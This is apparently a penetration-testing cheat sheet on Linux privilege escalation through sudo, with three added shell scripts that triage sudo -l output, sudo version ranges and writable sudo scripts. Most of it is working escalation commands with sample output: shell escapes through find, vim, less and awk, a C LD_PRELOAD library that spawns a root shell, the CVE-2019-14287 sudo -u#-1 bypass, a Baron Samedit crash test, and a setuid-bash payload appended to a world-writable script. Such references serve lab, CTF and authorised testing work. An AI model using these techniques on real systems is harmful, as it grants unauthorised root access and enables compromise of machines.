SUDO
Check sudo permissions
What can you run as root? — First thing to check always
sudo -l
Example Output
sudo -l
User www-data may run the following commands on <host>:
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/find
(ALL) NOPASSWD: /opt/backup.sh
(vim and find: look them up on GTFOBins; backup.sh: check whether you can write to the script or to its directory)
GTFOBins lookup
Abuse allowed binaries — BOOKMARK THIS SITE
https://gtfobins.github.io/
Search for each sudo binary
Example Output
sudo -l shows: (root) NOPASSWD: /usr/bin/find
GTFOBins: https://gtfobins.github.io/gtfobins/find/
Sudo: sudo find . -exec /bin/sh \; -quit
# whoami
root
Sudo with no password
Run directly without password — Free root commands
If a rule carries the NOPASSWD: tag in the sudo -l output, it runs with no authentication at all
Example Output
sudo -l
(root) NOPASSWD: /usr/bin/vim
sudo vim -c ':!bash'
# whoami
root
(No password prompt = direct escalation)
Sudo env_keep (LD_PRELOAD)
Hijack shared library loading — Runs your code as root
If sudo -l shows env_keep+=LD_PRELOAD, the variable survives sudo's env_reset and the dynamic loader honours it, because the command runs as real root rather than as a setuid binary:
pe.c:
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void pe(void) { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); }
gcc -shared -fPIC -o /tmp/pe.so pe.c
sudo LD_PRELOAD=/tmp/pe.so <allowed_cmd>
Example Output
sudo -l shows: env_keep+=LD_PRELOAD
gcc -shared -fPIC -o /tmp/pe.so pe.c
sudo LD_PRELOAD=/tmp/pe.so /usr/bin/allowed_command
# whoami
root
(Any binary from your sudo rules works as <allowed_cmd>; the constructor fires before its main() runs. A constructor is used instead of _init so the object links without -nostartfiles, and unsetenv stops the spawned bash from preloading pe.so again.)
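Added example, not from the original page: a small POSIX shell helper that does the triage of the four sections above in one pass over a sudo -l listing. It splits each rule into tags, run-as user and command, lists the NOPASSWD rules that run as root, builds the GTFOBins URL for each binary, and flags env_keep+=LD_PRELOAD. The listing embedded in the block is constructed for the example (host name and rules included); on a target, pass the real output with triage_sudo_l "$(sudo -l)". Function names are the example's own.

```shell
#!/bin/sh
# Added example: offline triage of `sudo -l` output. The listing below is a
# constructed sample in the layout sudo prints; it is not from a real host.
SAMPLE_SUDO_L='Matching Defaults entries for www-data on target:
    env_reset, env_keep+=LD_PRELOAD,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on target:
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/find
    (ALL) NOPASSWD: /opt/backup.sh
    (root) /usr/bin/less'

# One "TAGS|RUNAS|COMMAND" line per command. TAGS are the sudoers tags in
# front of the command (NOPASSWD, SETENV, ...), or "-" when there are none.
sudo_rules() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*\(/ {
            line = $0
            sub(/^[[:space:]]*\(/, "", line)
            runas = line
            sub(/\).*/, "", runas)              # "ALL : ALL) ..." -> "ALL : ALL"
            sub(/[[:space:]]*:.*/, "", runas)   # keep the run-as user only
            sub(/^[^)]*\)[[:space:]]*/, "", line)
            split("", tag)                      # tags persist along the line until overridden
            n = split(line, cmds, /,[[:space:]]*/)
            for (i = 1; i <= n; i++) {
                c = cmds[i]
                while (c ~ /^[A-Z_]+:/) {
                    t = c; sub(/:.*/, "", t)
                    opp = (t ~ /^NO/) ? substr(t, 3) : "NO" t
                    delete tag[opp]; tag[t] = 1   # PASSWD cancels NOPASSWD and vice versa
                    sub(/^[A-Z_]+:[[:space:]]*/, "", c)
                }
                out = ""
                for (name in tag) out = (out == "") ? name : out "," name
                tags = (out == "") ? "-" : out
                print tags "|" runas "|" c
            }
        }'
}

# Commands that run as root with no password and are not negated: the direct wins.
sudo_nopasswd_root() {
    sudo_rules "$1" | awk -F'|' '$1 ~ /NOPASSWD/ && ($2 == "root" || $2 == "ALL") && $3 !~ /^!/ { print $3 }'
}

# GTFOBins indexes by the binary's basename; arguments in the rule are ignored.
gtfobins_url() {
    bin=$(printf '%s\n' "$1" | awk '{ print $1 }')
    printf 'https://gtfobins.github.io/gtfobins/%s/\n' "$(basename "$bin")"
}

# 0 when LD_PRELOAD survives env_reset (env_keep+=LD_PRELOAD), 1 otherwise.
sudo_keeps_ld_preload() {
    printf '%s\n' "$1" | grep -Eq 'env_keep\+?=.*LD_PRELOAD'
}

triage_sudo_l() {
    if sudo_keeps_ld_preload "$1"; then
        echo "[!] env_keep keeps LD_PRELOAD: any rule below gives root via a preloaded .so"
    fi
    sudo_nopasswd_root "$1" | while IFS= read -r cmd; do
        echo "[+] NOPASSWD as root: $cmd -> $(gtfobins_url "$cmd")"
    done
}

triage_sudo_l "$SAMPLE_SUDO_L"
```

The parser follows sudoers tag semantics on a single line: a tag stays in force for the commands after it until its opposite (PASSWD for NOPASSWD, NOSETENV for SETENV) appears. Rules printed in another locale or with hostnames in the run-as field are outside what this handles.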
Sudo version exploit
CVE-2019-14287: sudo < 1.8.28, only when your rule is (ALL, !root); bypass with sudo -u#-1 <allowed_cmd> (uid -1 is treated as 0)
CVE-2021-3156 (Baron Samedit): 1.8.2 to 1.8.31p2 and 1.9.0 to 1.9.5p1; heap overflow in sudoedit -s, needs a public exploit built for the target's libc
sudo --version
Search: sudo <version> exploit
(Version strings lie on distro builds: fixes are backported without changing the number, so confirm with a runtime check rather than the version alone)
Example Output
sudo --version
Sudo version 1.8.31
1.8.31 is inside the CVE-2021-3156 (Baron Samedit) range, but many distros ship a patched 1.8.31, so test it:
sudoedit -s /
sudoedit: /: not a regular file    <- vulnerable; a patched build prints its usage message instead
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): corrupted
(The crash confirms the heap overflow: build a public CVE-2021-3156 exploit for this version and libc to get root)
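Added example, not part of the original cheat sheet: a shell check that pulls the version out of sudo --version output and says whether it falls in the upstream ranges for the two CVEs above, plus a grep for the (ALL, !root) rule shape that CVE-2019-14287 needs. The sample output is constructed and the function names are the example's own. Treat a hit as a reason to run sudoedit -s /, not as proof: distributions backport the fixes without bumping the version string.

```shell
#!/bin/sh
# Added example: map `sudo --version` output onto the CVE ranges in this
# section. Upstream ranges only; distro builds backport fixes without bumping
# the version, so confirm with `sudoedit -s /` before hunting for an exploit.

# Constructed sample of `sudo --version` output.
SAMPLE_VERSION_OUTPUT='Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31'

# "Sudo version 1.8.31p2" -> "1.8.31p2"
sudo_version_string() {
    printf '%s\n' "$1" | awk 'NR == 1 && $1 == "Sudo" { print $NF }'
}

# "1.8.31p2" -> "1 8 31 2" (patch level defaults to 0 when absent).
version_fields() {
    printf '%s\n' "$1" | awk -F'[.p]' '{ printf "%d %d %d %d\n", $1, $2, $3, (NF >= 4) ? $4 : 0 }'
}

# CVE-2021-3156 (Baron Samedit): 1.8.2 .. 1.8.31p2 and 1.9.0 .. 1.9.5p1.
baron_samedit_range() {
    set -- $(version_fields "$1")
    if [ "$1" -eq 1 ] && [ "$2" -eq 8 ] && [ "$3" -ge 2 ] && [ "$3" -le 31 ]; then return 0; fi
    if [ "$1" -eq 1 ] && [ "$2" -eq 9 ]; then
        [ "$3" -lt 5 ] && return 0
        [ "$3" -eq 5 ] && [ "$4" -lt 2 ] && return 0
    fi
    return 1
}

# CVE-2019-14287: anything before 1.8.28, exploitable only with an (ALL, !root) rule.
cve_2019_14287_range() {
    set -- $(version_fields "$1")
    [ "$1" -lt 1 ] && return 0
    [ "$1" -eq 1 ] && [ "$2" -lt 8 ] && return 0
    [ "$1" -eq 1 ] && [ "$2" -eq 8 ] && [ "$3" -lt 28 ] && return 0
    return 1
}

# The rule shape CVE-2019-14287 bypasses with `sudo -u#-1 <cmd>`.
has_all_not_root_rule() {
    printf '%s\n' "$1" | grep -Eq '\(ALL[[:space:]]*,[[:space:]]*!root\)'
}

check_sudo_version() {
    v=$(sudo_version_string "$1")
    echo "sudo $v"
    baron_samedit_range "$v" && echo "[?] in CVE-2021-3156 range: run 'sudoedit -s /' ('not a regular file' = vulnerable)"
    cve_2019_14287_range "$v" && echo "[?] before 1.8.28: if sudo -l shows (ALL, !root), try sudo -u#-1 <cmd>"
    return 0
}

check_sudo_version "$SAMPLE_VERSION_OUTPUT"
```

Only the major.minor.patch[pN] shape that upstream uses is parsed; a distro suffix such as -1ubuntu1.2 is not visible in sudo --version anyway, which is exactly why the runtime check matters.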
Sudo with shell escape
Many programs have shell escapes — Check GTFOBins for each binary
sudo vim -> :!sh
sudo less -> !sh
sudo man -> !sh
sudo awk 'BEGIN {system("/bin/sh")}'
Example Output
sudo vim -c ':!sh'
# whoami
root
(Escaped to root shell via vim)
Sudo script injection
Edit the script, add a payload — Writable scripts run as root
If sudo allows a script you can write to, or one whose directory you can write to: sudoers matches the path, not the file's owner, so a writable parent directory lets you replace the script outright
Example Output
sudo -l: (root) /opt/backup.sh
ls -la /opt/backup.sh
-rwxrwxrwx 1 root root <- WORLD WRITABLE!
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /opt/backup.sh
sudo /opt/backup.sh
/tmp/rootbash -p
# whoami
root
(-p keeps the effective uid 0; if /tmp is mounted nosuid the setuid bit is ignored there and whoami stays www-data, so copy the shell into another directory you own instead)
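Added example, not from the original page: a shell function that audits a script named in a sudo rule for the injection routes this section uses, plus the writable-directory variant and commands the script calls by bare name. The backup.sh fixture it creates under mktemp is constructed to mirror the world-writable /opt/backup.sh above; on a target, call audit_sudo_script with the real path. Function names are the example's own.

```shell
#!/bin/sh
# Added example: audit a script that a sudo rule lets you run as root.
# Reports the two routes in this section (file writable; parent directory
# writable, which lets you swap the file since sudoers matches the path, not
# the owner) and commands called by bare name, which are PATH-hijackable only
# when sudoers has no secure_path and you can set env (SETENV / env_keep).
# The fixture below is constructed; on a target pass the real script path.

audit_sudo_script() {
    script=$1
    [ -e "$script" ] || { echo "MISSING $script"; return 1; }
    [ -w "$script" ] && echo "WRITABLE_FILE $script"
    [ -w "$(dirname "$script")" ] && echo "WRITABLE_DIR $(dirname "$script")"
    # First word of each non-comment line, excluding absolute paths, variable
    # assignments, $VAR expansions and common shell keywords/builtins.
    grep -Ev '^[[:space:]]*(#|$)' "$script" | awk '
        BEGIN {
            split("if then else elif fi for do done while until case esac export local return exit set cd echo source", k, " ")
            for (i in k) kw[k[i]] = 1
        }
        $1 !~ /^\// && $1 !~ /^\$/ && $1 !~ /^[A-Za-z_][A-Za-z0-9_]*=/ && !($1 in kw) {
            print "RELATIVE_CMD " $1
        }' | sort -u
    return 0
}

# Constructed stand-in for /opt/backup.sh with the -rwxrwxrwx mode shown above.
make_fixture() {
    dir=$(mktemp -d)
    cat > "$dir/backup.sh" <<'EOF'
#!/bin/bash
# nightly web backup (constructed fixture, not a real script)
DEST=/backups/www.tgz
cd /var/www
tar czf "$DEST" .
/usr/bin/rsync -a /backups/ backup@10.0.0.5:/srv/
EOF
    chmod 777 "$dir/backup.sh"
    printf '%s\n' "$dir/backup.sh"
}

FIXTURE=$(make_fixture)
audit_sudo_script "$FIXTURE"
```

WRITABLE_FILE is the case from this section (append your payload). WRITABLE_DIR means you can mv the original aside and drop your own file under the same name, since sudo only compares the path. RELATIVE_CMD tar is worth noting but is a real route only when sudo -l shows no secure_path and you can influence PATH.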